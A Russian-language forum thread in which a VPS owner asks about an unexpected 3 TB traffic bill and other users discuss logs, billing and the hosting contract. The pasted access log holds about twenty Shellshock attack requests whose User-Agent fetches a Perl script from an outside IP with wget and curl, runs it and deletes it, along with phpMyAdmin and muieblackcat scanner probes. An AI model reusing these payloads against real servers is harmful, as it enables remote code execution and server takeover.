Огромное потребление трафика сервером

vanderv · 18 Апр 2015

Вчера получил письмо от провайдера, что мой сервер потребил трафика на 3тб. При том что оплаченным является только 30гб. Я честно сказать охренел от таких чисел.... Трафик превысил в 100 раз и они не приняли никаких мер... Выставляют мне счет на сумму почти в касарь. При том, что меры они приняли только спустя неделю (снизили канал до 10мбит). Получается, что всю неделю меня то ли ддосили, то ли что. Господа, как быть? Как проверить что это было? Как избежать такой не маленькой оплаты? Кстати всего на сервере инфы на 1гб.

metsys · 18 Апр 2015

экстрасенсы в отпуске

логи где?

mefish · 18 Апр 2015

Делаешь бекапы и переезжаешь к другому хостеру, оплату наврядле простят, а проблем добавят. Логи сдесь не нужны, т.к. их там скорей всего нету, на роутере нудно смотреть куда трафф шел. Как вариант брутеры или парсеры поставили или досилку, таких софтин хватает по линукс.

vanderv · 18 Апр 2015

mefish написал(а):
Делаешь бекапы и переезжаешь к другому хостеру, оплату наврядле простят, а проблем добавят. Логи сдесь не нужны, т.к. их там скорей всего нету, на роутере нудно смотреть куда трафф шел. Как вариант брутеры или парсеры поставили или досилку, таких софтин хватает по линукс.

Да уж точно не простят... и проблем будет, так как указывал паспортные данные и много другой инфы... В общем я вообще в асадке.
Кстати а это может быть ихней ошибкой? так как на сайте написано:
Последний месяц в дата-центре РУП «Белтелеком» наблюдаются технические сложности с предоставлением корректной информации о потребленном трафике. Вследствие этого мы вынуждены транслировать нашим клиентам не всегда достоверную информацию о трафике, потребленном виртуальными и выделенными серверами, размещенными на этой площадке.
Как можно проверить, что это не ошибка? Сервер под Ubuntu

Посмотрел логи, а там ппц что творится:

Код:

5.255.253.188 - - [15/Apr/2015:16:59:01 +0300] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +[url]http://yandex.com/bots[/url])"

5.255.253.188 - - [15/Apr/2015:16:59:04 +0300] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +[url]http://yandex.com/bots[/url])"

1.169.92.212 - - [15/Apr/2015:20:08:12 +0300] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 400 166 "-" "-"

201.82.102.5 - - [15/Apr/2015:21:33:13 +0300] "GET / HTTP/1.1" 301 178 "[url]http://best-seo-offer.com/try.php?u=http://steelie.by[/url]" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

200.8.108.122 - - [15/Apr/2015:22:25:54 +0300] "GET / HTTP/1.1" 301 178 "[url]http://best-seo-offer.com/try.php?u=http://steelie.by[/url]" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"

174.143.147.9 - - [15/Apr/2015:22:46:29 +0300] "GET HTTP/1.1 HTTP/1.1" 400 166 "-" "-"

174.143.147.9 - - [15/Apr/2015:22:46:34 +0300] "GET /cgi-bin/defaultwebpage.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:35 +0300] "GET /cgi-bin/env.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:36 +0300] "GET /cgi-bin/fire.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:37 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/hello.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/login.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/main.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:40 +0300] "GET /cgi-bin/meme.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:40 +0300] "GET /cgi-bin/php HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:40 +0300] "GET /cgi-bin/php4 HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:41 +0300] "GET /cgi-bin/php5 HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:41 +0300] "GET /cgi-bin/php5-cli HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:41 +0300] "GET /cgi-bin/recent.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/sat-ir-web.pl HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/test-cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/test-cgi.pl HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/test.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-sys/php5 HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"

69.197.148.87 - - [15/Apr/2015:23:14:09 +0300] "GET /muieblackcat HTTP/1.1" 301 178 "-" "-"

69.197.148.87 - - [15/Apr/2015:23:14:12 +0300] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"

69.197.148.87 - - [15/Apr/2015:23:14:12 +0300] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"

69.197.148.87 - - [15/Apr/2015:23:14:15 +0300] "GET //myadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"

69.197.148.87 - - [15/Apr/2015:23:14:15 +0300] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"

69.197.148.87 - - [15/Apr/2015:23:14:15 +0300] "GET //pma/scripts/setup.php HTTP/1.1" 301 178 "-" "-"

209.126.230.71 - - [16/Apr/2015:00:45:33 +0300] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 ([url]https://github.com/robertdavidgraham/masscan[/url])"

1.171.68.149 - - [16/Apr/2015:01:14:36 +0300] "CONNECT 163mx00.mxmail.netease.com:25 HTTP/1.0" 400 166 "-" "-"

61.240.144.67 - - [16/Apr/2015:02:04:45 +0300] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 ([url]https://github.com/robertdavidgraham/masscan[/url])"

69.197.148.92 - - [16/Apr/2015:05:10:36 +0300] "GET /muieblackcat HTTP/1.1" 301 178 "-" "-"

69.197.148.92 - - [16/Apr/2015:05:10:40 +0300] "GET //phpMyAdmin/scr

_sergey_ · 18 Апр 2015

Так в договоре, что сказано-то. Обязаны вы оплачивать трафик который вышел за пределы, внесённой оплаты или нет? Какие их действия при превышении трафа по договору?

latteo · 18 Апр 2015

vanderv написал(а):
Посмотрел логи, а там ппц что творится

Это нормально, на всех популярных доменах, к которым имею доступ, в логах такая фигня от софта автопоиска багов.

Так же каждый из этих ответов, всего лишь сотни байт, для того чтобы такими запросами сделать 3ТБ у вас должно быть 4к запросов в секунду! По логам такого трафика не видно. Да и мало серверов, которые на загнутся под такой нагрузкой

vanderv · 18 Апр 2015

_sergey_ написал(а):
Так в договоре, что сказано-то. Обязаны вы оплачивать трафик который вышел за пределы, внесённой оплаты или нет? Какие их действия при превышении трафа по договору?

Сказали, что я указал, сервер нужен без администрирования, следовательно они не следили за трафиком

latteo написал(а):
Это нормально, на всех популярных доменах, к которым имею доступ, в логах такая фигня от софта автопоиска багов.

Так же каждый из этих ответов, всего лишь сотни байт, для того чтобы такими запросами сделать 3ТБ у вас должно быть 4к запросов в секунду! По логам такого трафика не видно. Да и мало серверов, которые на загнутся под такой нагрузкой

У меня самый дешевый vps:
CPU 1 ядро
RAM 1 GB
HDD 20 GB

metsys · 18 Апр 2015

по факту - конечно печалька.
В таком случае у Вас начинается этап трений с провом. Перспектив решения в Вашу пользу ничтожно мало, но можете попробовать:
1) Оспорить договор (который у Вас есть?(!)) - а именно: вы оплачиваете законтрактированный объем траффика - 3ТБ. Меры, которые пров не придпринял по ограничению - не ваша проблема, что они не отключили.
2) Обвинить их в преднамеренном завышении показателей (вполоть до ручной накрутки счетчиков в базе, доступ к которой только у прова ).
3) Писать заявление в органы (с нулевой вероятностью решения в вашу пользу) на мошеничество со стороны прова в целях защиты от обвинения Вас в неоплате якобы потребленной услуги.

Уверен, современное законодательство любой страны СНГ очень слабо регулирует отношения в сфере IT, так что перспективы оценивайте сами.

зы
а на самом деле никто не обязан следить за уязвимостью предоставленных вам ресурсов кроме Вас. Так что то, что Вас хакнули - это не проблема прова. Думаю в данном случае он хочет воспользоваться (возможно и обоснованно) Вашей неквалифицированностью/рапиз"№;вом... итд

_sergey_ · 18 Апр 2015

Мне кажется администрирование к билингу никакого отношения не имеет, после обнуления счёта, доступ к серверу должен быть прекращён. И интересно как это прописано там в деталях. В общем платить только через суд.

vanderv · 18 Апр 2015

_sergey_ написал(а):
Мне кажется администрирование к билингу никакого отношения не имеет, после обнуления счёта, доступ к серверу должен быть прекращён. И интересно как это прописано там в деталях. В общем платить только через суд.

Да, но это идет как доп услуга. Я почитал договор, там написано что необходимо оплачивать в течение 15 дней после выставления счета. А выставили счет они мне вчера.
Но чисто по человечески мне тоже не понятно, как они позволили влезть клиенту в такие долги.

Огромное потребление трафика сервером

vanderv

Старатель

metsys

Хранитель порядка

mefish

Support

vanderv

Старатель

_sergey_

Писатель

latteo

Эффективное использование PHP, MySQL

vanderv

Старатель

metsys

Хранитель порядка

_sergey_

Писатель

vanderv

Старатель